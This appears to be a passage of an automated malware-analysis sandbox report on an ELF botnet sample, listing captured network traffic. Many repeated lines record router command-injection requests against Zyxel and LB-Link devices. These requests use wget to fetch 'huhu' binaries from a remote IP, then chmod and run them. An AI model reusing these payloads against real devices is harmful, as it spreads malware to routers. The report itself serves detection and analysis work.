            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48X-XSS-Protection: 1;mode=blockContent-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'X-Content-Type-Options: nosniffCONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlConnection: closeDate: Fri, 19 Jan 2024 10:24:09 GMTContent-Length: 168Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /goform/set_LimitClient_cfg was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 686X-Iinfo: 12-16866481-0 0NNN RT(1705685059776 0) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 32 2d 31 36 38 36 36 34 38 31 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 35 36 38 35 30 35 39 37 37 36 25 32 30 30 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 39 31 30 35 33 33 32 33 39 35 33 39 36 38 33 39 36 26 65 64 65 74 3d 39 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 39 31 30 35 33 33 32 33 39 35 33 39 36 38 33 39 36 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=12-16866481-0%200NNN%20RT%281705685059776%200%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-91053323953968396&edet=9&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-91053323953968396</iframe></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: pBVFNv9jh6.elfString found in binary or memory: http://103.245.236.146/huhu.mips;$
            Source: pBVFNv9jh6.elfString found in binary or memory: http://103.245.236.146/huhu.mpsl;
            Source: pBVFNv9jh6.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: pBVFNv9jh6.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
            Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
            Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
            Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
            Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
            Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
            Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
            Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
            Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
            Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
